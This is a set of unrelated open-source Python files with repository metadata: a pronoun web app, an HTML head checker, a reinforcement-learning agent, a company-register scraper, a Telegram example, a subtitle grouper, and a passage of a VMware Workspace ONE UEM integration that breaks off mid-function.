1b5d4c171448c0f5ea55bd6d507b06b897178fc5
|
[
"WTFPL",
"MIT"
] | null | null | null |
# mypronoun.is clone, that lets you define custom terms
# Because a closed-off request database isn't very helpful for self-expression
import web
from web.contrib.template import render_jinja
from scss import compiler
urls = (
'/(.*)\.css', 'stylesheet', # Preprocesses the stylesheet with sass
'/(.*)\.svg', 'svg', # returns the svg
'/(.*)', 'pronoun'
)
app = web.application(urls, globals())
builtin_pronouns = [
["he", "him", "his"],
["she", "her", "her"],
["they", "them", "their"],
# Commonly used neopronouns, from a list that claimed 'he' was a neopronoun
["e", "em", "eir"],
["per", "per", "pers"],
["ve", "ver", "vis"],
["ze", "hir", "hir"],
["zie", "hir", "hir"]
]
render_page = render_jinja('pages', encoding='utf-8')
def test_pronouns(nouns):
a = nouns[0]
for n in builtin_pronouns:
if a == n[0]:
if len(nouns) > 1:
if not nouns[1] == n[1]:
continue
return [[pronoun.capitalize() for pronoun in n]]
return None
class pronoun:
def GET(self, args):
pronouns = args.split('/')
if pronouns == ['']:
# TODO: HOMEPAGE
return render_page.index()
elif '&&' in args:
a = [] # The new list
b = [] # Current List working on
for p in pronouns:
g = test_pronouns([p])
if not g is None:
a.append(g[0])
b = []
continue
if p == "&&":
if len(b) > 0:
a.append(b)
b = []
continue
b.append(p)
if len(b) > 0:
a.append(b)
print(a)
return render_page.pronouns(pronouns=a)
elif len(pronouns) == 1:
# Try a built-in pronoun
a = test_pronouns(pronouns)
if not a is None:
return render_page.pronouns(pronouns=a)
return render_page.error(error="We don't seem to know that one! Try specifying them all, in a nominative/possesive/oblique format.")
elif len(pronouns) == 2:
# Try a built-in again
a = test_pronouns(pronouns)
if not a is None:
return render_page.pronouns(pronouns=a)
# Two is enough to construct SOME pronouns
pronouns = [n.capitalize() for n in pronouns]
return render_page.pronouns(pronouns=[pronouns])
elif len(pronouns) == 3:
pronouns = [n.capitalize() for n in pronouns]
return render_page.pronouns(pronouns=[pronouns])
elif not "&&" in pronouns:
return render_page.error(error="You have specified too many pronouns! Try 3, in a nominative/possesive/oblique format.<br>If you wish to have another set, seperate it with &&.")
class stylesheet: # TODO: is it inefficient to serve it every time? Maybe compile the scss when ran and serve that!
def GET(self, args):
return compiler.compile_file(args+".scss")
class svg:
def GET(self, args):
return open(args+".svg").read()
if __name__ == "__main__":
app.run()
| 25.707547 | 181 | 0.640367 |
4d3391e6671e9315173e5de530b420b07417d6bc
| 4,178 |
py
|
Python
|
checks/html_head.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 19 |
2018-04-20T11:03:41.000Z
|
2022-01-12T20:58:56.000Z
|
checks/html_head.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 160 |
2018-04-05T16:12:59.000Z
|
2022-03-01T13:01:27.000Z
|
checks/html_head.py
|
thegreenwebfoundation/green-spider
|
68f22886178bbe5b476a4591a6812ee25cb5651b
|
[
"Apache-2.0"
] | 8 |
2018-11-05T13:07:57.000Z
|
2021-06-11T11:46:43.000Z
|
"""
Extracts information from the html <head>, like existence and value
of certain meta tags, link tags, title, etc.
"""
import logging
import re
from urllib.parse import urljoin
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from checks.abstract_checker import AbstractChecker
class Checker(AbstractChecker):
def __init__(self, config, previous_results=None):
super().__init__(config, previous_results)
def run(self):
results = {}
for url in self.config.urls:
results[url] = self.get_content(url)
return results
def get_content(self, url):
"""
Expects page_content_dict['content'] to carry the HTML content
"""
page_content = self.previous_results['page_content'][url]
assert 'content' in page_content
assert 'response_headers' in page_content
assert 'content-type' in page_content['response_headers']
if page_content['content'] is None:
return
soup = BeautifulSoup(page_content['content'], 'html.parser')
head = soup.find('head')
result = {
'title': self.get_title(head),
'link_canonical': self.get_link_canonical(head, url),
'link_rss_atom': self.get_link_rss_atom(head, url),
'link_icon': self.get_link_icon(head, url),
'generator': self.get_generator(head),
'opengraph': self.get_opengraph(head),
'viewport': self.get_viewport(head),
}
return result
def get_title(self, head):
"""Extract and clean up page title"""
if head is None:
return
title = None
tag = head.find('title')
if tag is None:
return
title = tag.get_text()
# clean up
title = title.replace(u'\u00a0', ' ')
title = title.replace(' ', ' ')
title = title.strip()
return title
def get_link_canonical(self, head, url):
if head is None:
return
link = head.find('link', rel='canonical')
if link:
return urljoin(url, link.get('href'))
def get_link_rss_atom(self, head, url):
if head is None:
return
hrefs = []
rss_links = head.find_all('link', type='application/rss+xml')
atom_links = head.find_all('link', type='application/atom+xml')
if rss_links:
for link in rss_links:
hrefs.append(link.get('href'))
if atom_links:
for link in rss_links:
hrefs.append(link.get('href'))
# make URLs absolute
for i in range(len(hrefs)):
parsed = urlparse(hrefs[i])
if parsed.scheme == '':
hrefs[i] = urljoin(url, hrefs[i])
return hrefs
def get_link_icon(self, head, url):
if head is None:
return
tag = head.find('link', rel=lambda x: x and x.lower() == 'icon')
if tag:
return urljoin(url, tag.get('href'))
tag = head.find('link', rel=lambda x: x and x.lower() == 'shortcut icon')
if tag:
return urljoin(url, tag.get('href'))
def get_generator(self, head):
if head is None:
return
tags = head.select('[name=generator]')
if tags:
return tags[0].get('content')
def get_opengraph(self, head):
if head is None:
return
# we find tags by matching this property/itemprop value regex
property_re = re.compile('^og:')
opengraph = set()
for tag in head.find_all(property=property_re):
opengraph.add(tag.get('property'))
for tag in head.find_all(itemprop=property_re):
opengraph.add(tag.get('itemprop'))
opengraph = sorted(list(opengraph))
if opengraph != []:
return opengraph
def get_viewport(self, head):
if head is None:
return
tags = head.select('[name=viewport]')
if tags:
return tags[0].get('content')
| 27.30719 | 81 | 0.561034 |
150b1f4b3826c879ab58eb71c304de9f4aaca2b7
| 10,516 |
py
|
Python
|
tensorforce/agents/dqfd_agent.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | null | null | null |
tensorforce/agents/dqfd_agent.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | null | null | null |
tensorforce/agents/dqfd_agent.py
|
gian1312/suchen
|
df863140fd8df1ac2e195cbdfa4756f09f962270
|
[
"Apache-2.0"
] | 1 |
2019-11-29T12:28:33.000Z
|
2019-11-29T12:28:33.000Z
|
# Copyright 2017 reinforce.io. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from six.moves import xrange
from tensorforce.agents import LearningAgent
from tensorforce.models import QDemoModel
class DQFDAgent(LearningAgent):
"""
Deep Q-learning from demonstration agent
([Hester et al., 2017](https://arxiv.org/abs/1704.03732)).
"""
def __init__(
self,
states,
actions,
network,
batched_observe=True,
batching_capacity=1000,
scope='dqfd',
device=None,
saver=None,
summarizer=None,
execution=None,
variable_noise=None,
states_preprocessing=None,
actions_exploration=None,
reward_preprocessing=None,
update_mode=None,
memory=None,
optimizer=None,
discount=0.99,
distributions=None,
entropy_regularization=None,
target_sync_frequency=10000,
target_update_weight=1.0,
huber_loss=None,
# first_update=10000,
# repeat_update=1
expert_margin=0.5,
supervised_weight=0.1,
demo_memory_capacity=10000,
demo_sampling_ratio=0.2
):
"""
Initializes the DQFD agent.
Args:
update_mode (spec): Update mode specification, with the following attributes:
- unit: 'timesteps' if given (default: 'timesteps').
- batch_size: integer (default: 32).
- frequency: integer (default: 4).
memory (spec): Memory specification, see core.memories module for more information
(default: {type='replay', include_next_states=true, capacity=1000*batch_size}).
optimizer (spec): Optimizer specification, see core.optimizers module for more
information (default: {type='adam', learning_rate=1e-3}).
target_sync_frequency (int): Target network sync frequency (default: 10000).
target_update_weight (float): Target network update weight (default: 1.0).
huber_loss (float): Huber loss clipping (default: none).
expert_margin (float): Enforced supervised margin between expert action Q-value and
other Q-values (default: 0.5).
supervised_weight (float): Weight of supervised loss term (default: 0.1).
demo_memory_capacity (int): Capacity of expert demonstration memory (default: 10000).
demo_sampling_ratio (float): Runtime sampling ratio of expert data (default: 0.2).
"""
# Update mode
if update_mode is None:
update_mode = dict(
unit='timesteps',
batch_size=32,
frequency=4
)
elif 'unit' in update_mode:
assert update_mode['unit'] == 'timesteps'
else:
update_mode['unit'] = 'timesteps'
# Memory
if memory is None:
# Default capacity of 1000 batches
memory = dict(
type='replay',
include_next_states=True,
capacity=(1000 * update_mode['batch_size'])
)
else:
assert memory['include_next_states']
# Optimizer
if optimizer is None:
optimizer = dict(
type='adam',
learning_rate=1e-3
)
self.target_sync_frequency = target_sync_frequency
self.target_update_weight = target_update_weight
self.double_q_model = True
self.huber_loss = huber_loss
self.expert_margin = expert_margin
self.supervised_weight = supervised_weight
self.demo_memory_capacity = demo_memory_capacity
# The demo_sampling_ratio, called p in paper, controls ratio of expert vs online training samples
# p = n_demo / (n_demo + n_replay) => n_demo = p * n_replay / (1 - p)
self.demo_batch_size = int(demo_sampling_ratio * update_mode['batch_size'] / (1.0 - demo_sampling_ratio))
assert self.demo_batch_size > 0, 'Check DQFD sampling parameters to ensure ' \
'demo_batch_size is positive. (Calculated {} based on current' \
' parameters)'.format(self.demo_batch_size)
# This is the demonstration memory that we will fill with observations before starting
# the main training loop
super(DQFDAgent, self).__init__(
states=states,
actions=actions,
batched_observe=batched_observe,
batching_capacity=batching_capacity,
scope=scope,
device=device,
saver=saver,
summarizer=summarizer,
execution=execution,
variable_noise=variable_noise,
states_preprocessing=states_preprocessing,
actions_exploration=actions_exploration,
reward_preprocessing=reward_preprocessing,
update_mode=update_mode,
memory=memory,
optimizer=optimizer,
discount=discount,
network=network,
distributions=distributions,
entropy_regularization=entropy_regularization
)
def initialize_model(self):
return QDemoModel(
states=self.states,
actions=self.actions,
scope=self.scope,
device=self.device,
saver=self.saver,
summarizer=self.summarizer,
execution=self.distributed,
batching_capacity=self.batching_capacity,
variable_noise=self.variable_noise,
states_preprocessing=self.states_preprocessing,
actions_exploration=self.actions_exploration,
reward_preprocessing=self.reward_preprocessing,
update_mode=self.update_mode,
memory=self.memory,
optimizer=self.optimizer,
discount=self.discount,
network=self.network,
distributions=self.distributions,
entropy_regularization=self.entropy_regularization,
target_sync_frequency=self.target_sync_frequency,
target_update_weight=self.target_update_weight,
# DQFD always uses double dqn, which is a required key for a q-model.
double_q_model=True,
huber_loss=self.huber_loss,
expert_margin=self.expert_margin,
supervised_weight=self.supervised_weight,
demo_memory_capacity=self.demo_memory_capacity,
demo_batch_size=self.demo_batch_size
)
# This is handled by the model now
# def observe(self, reward, terminal):
# """
# Adds observations, updates via sampling from memories according to update rate.
# DQFD samples from the online replay memory and the demo memory with
# the fractions controlled by a hyper parameter p called 'expert sampling ratio.
#
# Args:
# reward:
# terminal:
# """
# super(DQFDAgent, self).observe(reward=reward, terminal=terminal)
# if self.timestep >= self.first_update and self.timestep % self.update_frequency == 0:
# for _ in xrange(self.repeat_update):
# self.model.demonstration_update()
def import_demonstrations(self, demonstrations):
"""
Imports demonstrations, i.e. expert observations. Note that for large numbers of observations,
set_demonstrations is more appropriate, which directly sets memory contents to an array an expects
a different layout.
Args:
demonstrations: List of observation dicts
"""
if isinstance(demonstrations, dict):
if self.unique_state:
demonstrations['states'] = dict(state=demonstrations['states'])
if self.unique_action:
demonstrations['actions'] = dict(action=demonstrations['actions'])
self.model.import_demo_experience(**demonstrations)
else:
if self.unique_state:
states = dict(state=list())
else:
states = {name: list() for name in demonstrations[0]['states']}
internals = {name: list() for name in demonstrations[0]['internals']}
if self.unique_action:
actions = dict(action=list())
else:
actions = {name: list() for name in demonstrations[0]['actions']}
terminal = list()
reward = list()
for demonstration in demonstrations:
if self.unique_state:
states['state'].append(demonstration['states'])
else:
for name, state in states.items():
state.append(demonstration['states'][name])
for name, internal in internals.items():
internal.append(demonstration['internals'][name])
if self.unique_action:
actions['action'].append(demonstration['actions'])
else:
for name, action in actions.items():
action.append(demonstration['actions'][name])
terminal.append(demonstration['terminal'])
reward.append(demonstration['reward'])
self.model.import_demo_experience(
states=states,
internals=internals,
actions=actions,
terminal=terminal,
reward=reward
)
def pretrain(self, steps):
"""
Computes pre-train updates.
Args:
steps: Number of updates to execute.
"""
for _ in xrange(steps):
self.model.demo_update()
| 39.385768 | 113 | 0.600323 |
429406f4f27b81748c79467b7d59db0cc518a219
| 100 |
py
|
Python
|
ggit_platform/apps.py
|
girlsgoit/GirlsGoIT
|
447cd15c44ebee4af9e942a079d681be8683239f
|
[
"MIT"
] | 1 |
2019-02-27T21:20:54.000Z
|
2019-02-27T21:20:54.000Z
|
ggit_platform/apps.py
|
girlsgoit/GirlsGoIT
|
447cd15c44ebee4af9e942a079d681be8683239f
|
[
"MIT"
] | null | null | null |
ggit_platform/apps.py
|
girlsgoit/GirlsGoIT
|
447cd15c44ebee4af9e942a079d681be8683239f
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class GgitPlatformConfig(AppConfig):
name = 'ggit_platform'
| 16.666667 | 36 | 0.78 |
c009520bc5df6124e77038a16f913e637f6ad1b7
| 2,707 |
py
|
Python
|
scrape.py
|
digitalegarage/commerzbank-scraper
|
818c759ed0f62cf35aaebc38ad769ffb415c2cd5
|
[
"MIT"
] | null | null | null |
scrape.py
|
digitalegarage/commerzbank-scraper
|
818c759ed0f62cf35aaebc38ad769ffb415c2cd5
|
[
"MIT"
] | null | null | null |
scrape.py
|
digitalegarage/commerzbank-scraper
|
818c759ed0f62cf35aaebc38ad769ffb415c2cd5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from mechanize import Browser
from bs4 import BeautifulSoup as BS
from datetime import datetime
import re
import os
import csv
import config
###############
### SCRAPER ###
###############
def get_documents (s = config.suchbegriff, b = config.bereich, l = config.language, sd = config.start_day, sm = config.start_month, sy = config.start_year, ed = config.end_day, em = config.end_month, ey = config.end_year):
# Browser initialisieren
br = Browser()
br.set_handle_robots(False)
br.set_handle_referer(False)
br.set_handle_refresh(False)
br.addheaders = [('User-agent', 'Firefox')]
br.open('https://www.unternehmensregister.de/ureg/search1.6.html')
# Formular der Seite mit Optionen von oben ausfuellen
br.select_form(name="searchRegisterForm")
br['searchRegisterForm:registerDataFullText'] = s
br['searchRegisterForm:publicationsOfCapitalInvestmentsCategory'] = [b,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsLanguage'] = [l,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsStartDateDay'] = [sd,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsStartDateMonth'] = [sm,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsStartDateYear'] = [sy,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsEndDateDay'] = [ed,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsEndDateMonth'] = [em,]
br['searchRegisterForm:publicationsOfCapitalInvestmentsPublicationsEndDateYear'] = [ey,]
br.submit()
#Dokumente in den Ordner "Sites" abspeichern
destination = "Sites/"
base_url = br.geturl()
soup = BS(br.response().read(), "html.parser")
# nDocs zählt die Dokumente
nDocs = 1
page_next = ""
# klickt den weiter button am ende der Seiter, falls dieser existiert
while page_next is not None:
# suche den weiter-Button
try:
page_next = soup.find('div', attrs={'id': 'result_pagingnav'}).find(string="Weiter").parent.get('href')
except AttributeError:
page_next = None
# links zu den dokumenten haben den tite. 'Stimmrechtsmitteilungen'
doc_links = soup.find_all('a', attrs={'title': 'Mitteilung bedeutender Stimmrechtsanteile'})
for doc in doc_links:
br.open(base_url + doc.get('href'))
soup = BS(br.response().read().decode('utf-8'), "html.parser")
f = open(destination + "/" + re.search("id=([0-9]*)", doc.get('href')).group(0).replace("=","_") + ".html", 'w')
f.write(str(soup))
f.close()
print nDocs
print base_url + doc.get('href')
nDocs = nDocs + 1
if page_next is not None:
br.open(base_url + page_next)
soup = BS(br.response().read(), "html.parser")
get_documents()
| 29.107527 | 223 | 0.72331 |
3f26cba2b70b69db1956b9a560ae419b2b208567
| 637 |
py
|
Python
|
examples/message_received_poll_example.py
|
Hofei90/telegram_api
|
8e910e15d7147db4b3828fa6fd1cfe2f5d33c077
|
[
"MIT"
] | null | null | null |
examples/message_received_poll_example.py
|
Hofei90/telegram_api
|
8e910e15d7147db4b3828fa6fd1cfe2f5d33c077
|
[
"MIT"
] | 4 |
2019-04-24T12:56:34.000Z
|
2020-06-25T20:16:56.000Z
|
examples/message_received_poll_example.py
|
Hofei90/telegram_api
|
8e910e15d7147db4b3828fa6fd1cfe2f5d33c077
|
[
"MIT"
] | null | null | null |
import os
import toml
import telegram_bot_api as api
def config_laden():
configfile = os.path.join(SKRIPTPFAD, "example_cfg.toml")
with open(configfile) as file:
return toml.loads(file.read())
SKRIPTPFAD = os.path.abspath(os.path.dirname(__file__))
CONFIG = config_laden()
def main():
bot = api.Bot(CONFIG["telegram"]["token"])
while True:
messages = bot.get_updates()
for message in messages:
print("Gesamte Rückgabe mit sämlichen Informationen:")
print(message)
print(f"Nur Text: {message['message']['text']}")
if __name__ == "__main__":
main()
| 21.233333 | 66 | 0.643642 |
58ad08132952b852962f0a0d52edc84c273d70ab
| 3,993 |
py
|
Python
|
group_sentences.py
|
NickForero11/Subbler
|
ed528514e96ddc30d58230ff98ff0fd5216ea5de
|
[
"MIT"
] | null | null | null |
group_sentences.py
|
NickForero11/Subbler
|
ed528514e96ddc30d58230ff98ff0fd5216ea5de
|
[
"MIT"
] | null | null | null |
group_sentences.py
|
NickForero11/Subbler
|
ed528514e96ddc30d58230ff98ff0fd5216ea5de
|
[
"MIT"
] | null | null | null |
"""Module to handle the creation of subtitles based on AWS Transcribe
processed data.
"""
from sys import exit
def chunk_array(array, size):
"""Create a list of sublists of a specific size based on another list.
Please take in account that if the size is not an exact divisor of the
original list length, the last sublist of the list will have less elements
than expected.
Examples:
Inexact:
array: [1,2,3,4,5]
size: 2
result: [ [1,2], [3,4], [5] ]
Exact:
array: [1,2,3,4]
size: 2
result: [ [1,2], [3,4] ]
Arguments:
array (list): the array that will be divided in subarrays of len: size
size (int): the size of every subarray in the response list (taking
in account the exactness).
Returns:
list: a list of sublists of length equal to size based on array.
"""
result = []
for i in range(0, len(array), size):
chunk = array[i:i + size]
result.append(chunk)
return result
def get_group_sentences(data):
"""Creates a list of subtitles with 2 lines of 5 words and its timestamps.
Arguments:
data (dict): a dict (from a JSON data) with transcription data
following the AWS Transcribe format:
{
data:[
{
"start_time": "106.11",
"end_time": "106.64",
"alternatives": [
{
"confidence": "1.0",
"content": "hi"
}
],
"type": "pronunciation"
}, ...
]
}
Returns:
list: a list of subtitles following this format:
[
{
'init_mark': 106.11,
'end_mark': 156.67,
'text': [
'there are subtitle lines of',
'only five words per line'
]
}, ...
]
"""
if not data:
print("There isn't any transcription data")
exit(1)
try:
# Create a list of sublists with a length of ten words
stamps = chunk_array(data['data'], 10)
subtitles = []
for line in stamps:
if len(line) > 1:
# Don't start a line with punctuation symbols.
if line[0]['type'] != 'punctuation':
first_word = line[0]
else:
first_word = line[1]
# Don't end a line with punctuation symbols.
if line[-1]['type'] != 'punctuation':
last_word = line[-1]
else:
last_word = line[-2]
# Set timemarks
init_mark = first_word['start_time']
end_mark = last_word['end_time']
# Create a list of words
words = []
for text in line:
word = text['alternatives'][0]['content']
words.append(word)
# Create two lines of five words
paragraph = chunk_array(words, 5)
pre_sentences = [' '.join(line) for line in paragraph]
# Adjust punctuation symbols.
sentences = [
line.replace(' .', '.').replace(' ,', ',')
for line in pre_sentences
]
# Add subtitle to the response list
subtitles.append(
{
'init_mark': init_mark,
'end_mark': end_mark,
'text': sentences
}
)
return subtitles
except KeyError:
print("The transcripted data isn't in the correct format")
exit(1)
| 30.953488 | 79 | 0.454295 |
45219ec6399dff04b10b1dd7070b81ecf6216806
| 22,271 |
py
|
Python
|
Packs/VMwareWorkspaceONEUEM/Integrations/VMwareWorkspaceONEUEM/VMwareWorkspaceONEUEM.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/VMwareWorkspaceONEUEM/Integrations/VMwareWorkspaceONEUEM/VMwareWorkspaceONEUEM.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/VMwareWorkspaceONEUEM/Integrations/VMwareWorkspaceONEUEM/VMwareWorkspaceONEUEM.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
from CommonServerUserPython import * # noqa
import requests
import traceback
from typing import Dict, Tuple, List, Any, Optional
# Disable insecure warnings
# requests.packages.urllib3.disable_warnings() # pylint: disable=no-member
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ' # ISO8601 format with UTC, default in XSOAR
READABLE_DATE_FORMAT = '%B %d, %Y at %I:%M:%S %p'
API_VERSION = 2
LOGGING_INTEGRATION_NAME = "[VMware Workspace ONE UEM (AirWatch MDM)]"
HTTP_ERROR = {
401: "An error occurred while validating the credentials, please check the username or password.",
403: "Invalid API key or the user doesn't have sufficient permissions to perform this operation.",
404: "The resource cannot be found.",
407: "Proxy Error - cannot connect to proxy. Either try clearing the 'Use system proxy' check-box or"
"check the host, authentication details and connection details for the proxy.",
500: "The server encountered an internal error for VMWare Workspace ONE UEM "
"and was unable to complete your request."
}
ARG_TO_PARAM_OWNERSHIP = {
"corporate owned": "C",
"employee owned": "E",
"shared": "S",
"undefined": "undefined"
}
REVERSED_ARG_TO_PARAM_OWNERSHIP = {
'C': 'Corporate owned',
'E': 'Employee owned',
'S': 'Shared',
'Undefined': 'Undefined'
}
MESSAGES = {
"NO_RECORDS_FOUND": "No {} record(s) found for the given argument(s).",
"INVALID_PAGE_SIZE": "Argument page_size should be greater than 1.",
"INVALID_PAGE": "Argument page should be greater than 0.",
"INVALID_OWNERSHIP": "Argument ownership should be one of the following: "
"Corporate owned, Employee owned, Shared, or Undefined.",
"INVALID_SORT_ORDER": "Argument sort_order should be one of the following: ASC, or DESC.",
"REQUIRED_ARGUMENT": "{} is a required argument.",
"INVALID_COMPLIANCE_STATUS": "Argument compliance_status should be one of the following: true, or false."
}
CONSTANT_STRING = {
"DEVICE_FRIENDLY": "Device Friendly Name",
"SERIAL_NUM": "Serial Number",
"MAC_ADDR": "MAC Address",
"COMPLIANCE_STATUS": "Compliance Status",
"USER_EMAIL": "User Email Address",
"LAST_SEEN": "Last Seen (In UTC)"
}
''' CLIENT CLASS '''
class Client(BaseClient):
"""Client class to interact with the service API
This Client implements API calls, and does not contain any XSOAR logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
For this implementation, no special attributes defined
"""
def __init__(self, username, password, base_url, headers, verify=True, proxy=False):
"""
Store username and password for authentication.
:type username: ``string``
:param username: username of salesforce account
:type password: ``string``
:param password: password of salesforce account
:type base_url: ``string``
:param base_url: service API url.
:type headers: ``dict``
:param headers: The request headers, for example: {'Accept`: `application/json`}.
:type verify: ``bool``
:param verify: SSL verification is handled out of the box.
:type proxy: ``bool``
:param proxy: system proxy is handled out of the box.
"""
super().__init__(base_url=base_url, auth=(username, password), headers=headers, verify=verify, proxy=proxy)
def http_request(self, *args, **kwargs) -> requests.Response:
"""
Overrides the _http_request method of base class and authenticate using bearer token generated from
session id which is cached in IntegrationContext
"""
kwargs['ok_codes'] = (200, 201, 204)
kwargs['error_handler'] = self.exception_handler
kwargs['resp_type'] = 'response'
return super()._http_request(*args, **kwargs)
@staticmethod
def exception_handler(response: requests.models.Response):
"""
Handle error in the response and display error message based on status code.
:type response: ``requests.models.Response``
:param response: response from API.
:raises: raise DemistoException based on status code of response.
"""
err_msg = ""
if response.status_code in HTTP_ERROR:
if response.status_code in [401, 403]:
demisto.error(f"{LOGGING_INTEGRATION_NAME} {response.json()}")
err_msg = HTTP_ERROR[response.status_code]
elif response.status_code > 500:
err_msg = HTTP_ERROR[500]
elif response.status_code not in HTTP_ERROR:
err_msg = 'Error in API call [{}] - {}' \
.format(response.status_code, response.reason)
headers = response.headers
if 'application/json' in headers.get('Content-Type', ''):
error_entry = response.json()
if error_entry.get('message'):
err_msg = '{}'.format(error_entry.get('message'))
raise DemistoException(err_msg)
''' HELPER FUNCTIONS '''
def remove_empty_elements_for_context(src):
"""
Recursively remove empty lists, empty dicts, empty string or None elements from a dictionary.
:type src: ``dict``
:param src: Input dictionary.
:return: Dictionary with all empty lists,empty string and empty dictionaries removed.
:rtype: ``dict``
"""
def empty(x):
return x is None or x == '' or x == {} or x == []
if not isinstance(src, (dict, list)):
return src
elif isinstance(src, list):
return [v for v in (remove_empty_elements_for_context(v) for v in src) if not empty(v)]
else:
return {k: v for k, v in ((k, remove_empty_elements_for_context(v))
for k, v in src.items()) if not empty(v)}
def validate_uuid_argument(args: dict) -> str:
"""
To validate argument uuid.
:type args: ``dict``
:param args: dictionary returned by demisto.args
:return: validated arguments.
:rtype: ``str``
"""
if not args.get('uuid'):
raise ValueError(MESSAGES['REQUIRED_ARGUMENT'].format("uuid"))
return args.get('uuid') # type: ignore
def camel_to_pascal(src: dict) -> dict:
"""
Convert the keys of a nested dictionary and list from camel case to pascal case.
:type src: ``dict``
:param src: the dictionary whose keys require change in case
:return: a dictionary with the keys changed from camel case to pascal case
"""
if not isinstance(src, (dict, list)):
return src
return_src = {}
def capitalize_first_letter(string: str) -> str:
"""
Capitalize only the first letter of a string
:param string: string whose first letter needs to be capitalized
:return: string with first letter capitalized
"""
return string[0].upper() + string[1:]
if isinstance(src, list):
return_src = [camel_to_pascal(obj) for obj in src]
return return_src
for key, value in src.items():
if isinstance(value, (dict, list)):
return_src[capitalize_first_letter(key)] = camel_to_pascal(value) # type: ignore
else:
return_src[capitalize_first_letter(key)] = value
return return_src
def prepare_context_hr_os_updates_list_command(result: dict, uuid: str) -> Tuple[Union[dict, List[dict]], str]:
"""
To prepare context and human readable output for vmwuem_device_os_updates_list_command.
:type result: ``dict``
:param result: dictionary returned by api response of vmwuem_device_os_updates_list_command.
:type uuid: ``str``
:param uuid: argument of vmwuem_device_os_updates_list_command.
:return: Context and human readable output.
:rtype: ``Tuple[Dict, str]``
"""
result = remove_empty_elements_for_context(result) # type: ignore
result['OSUpdateList'] = camel_to_pascal(result['OSUpdateList'])
result['Uuid'] = uuid.lower()
context_data = result
hr = []
for osupdate in result['OSUpdateList']:
release_date = osupdate.get('ReleaseDate', '')
expiration_date = osupdate.get('ExpiationDate', '')
if release_date:
release_date = dateparser.parse(release_date).strftime(READABLE_DATE_FORMAT) # type: ignore
if expiration_date:
expiration_date = dateparser.parse(expiration_date).strftime(READABLE_DATE_FORMAT) # type: ignore
data = {
'Device UUID': result['Uuid'],
'Update Name': osupdate.get('DeviceUpdateName', ''),
'Update Version': osupdate.get('DeviceUpdateVersion', ''),
'Critical Update': "Yes" if osupdate.get('IsCritical', False) else "No",
'Restart Required': "Yes" if osupdate.get('RestartRequired', False) else "No",
'Release Date': release_date,
'Expiration Date': expiration_date
}
hr.append(data)
headers = ['Device UUID', 'Update Name', 'Update Version', 'Critical Update', 'Restart Required',
'Release Date', 'Expiration Date']
hr_output = tableToMarkdown('OSUpdate(s)', hr, headers=headers, removeNull=True)
return context_data, hr_output
def strip_args(args: dict):
"""
Strips argument dictionary values of spaces
:type args: dict
:param args: argument dictionary
"""
for key, value in args.items():
if isinstance(value, str):
args[key] = value.strip()
def is_present_in_list(value_to_check: Any, list_to_check_in: List[Any], message: str) -> Optional[bool]:
"""
Checks for presence of value in list, raises ValueError, if the value is not present
:type value_to_check: ``Any``
:param value_to_check: value to check presence of
:type list_to_check_in: ``List[Any]``
:param list_to_check_in: list to check the presence of value
:type message: ``str``
:param message: message with which the ValueError will be raised with
:rtype: ``bool``
:returns: True, if the value is present
"""
if value_to_check not in list_to_check_in:
raise ValueError(message)
return True
def prepare_context_and_hr_for_devices_search(response: dict) -> Tuple[Union[dict, List[dict]], str]:
"""
Prepare entry context and human readable for devices search command
:type response: ``dict``
:param response: dictionary json response from search api
:rtype: ``Tuple[list, str]``
:return: tuple of dict entry context and str human readable
"""
context = response.get('Devices', [])
hr_devices_list = []
for device in context:
last_seen = device.get('LastSeen', '')
if last_seen:
last_seen = dateparser.parse(last_seen).strftime(READABLE_DATE_FORMAT) # type: ignore
compromised = device.get('CompromisedStatus', '')
if isinstance(compromised, str):
compromised = "Unknown"
else:
compromised = "Compromised" if compromised else "Not Compromised"
ownership = device.get('Ownership', '')
if ownership in REVERSED_ARG_TO_PARAM_OWNERSHIP.keys():
ownership = REVERSED_ARG_TO_PARAM_OWNERSHIP[ownership]
else:
ownership = ''
hr_devices_list.append({
CONSTANT_STRING['DEVICE_FRIENDLY']: device.get(CONSTANT_STRING['DEVICE_FRIENDLY'].replace(' ', ''), ''),
"UUID": device.get('Uuid', ''),
"Platform": device.get('Platform', ''),
"Model": device.get('Model', ''),
"Ownership": ownership,
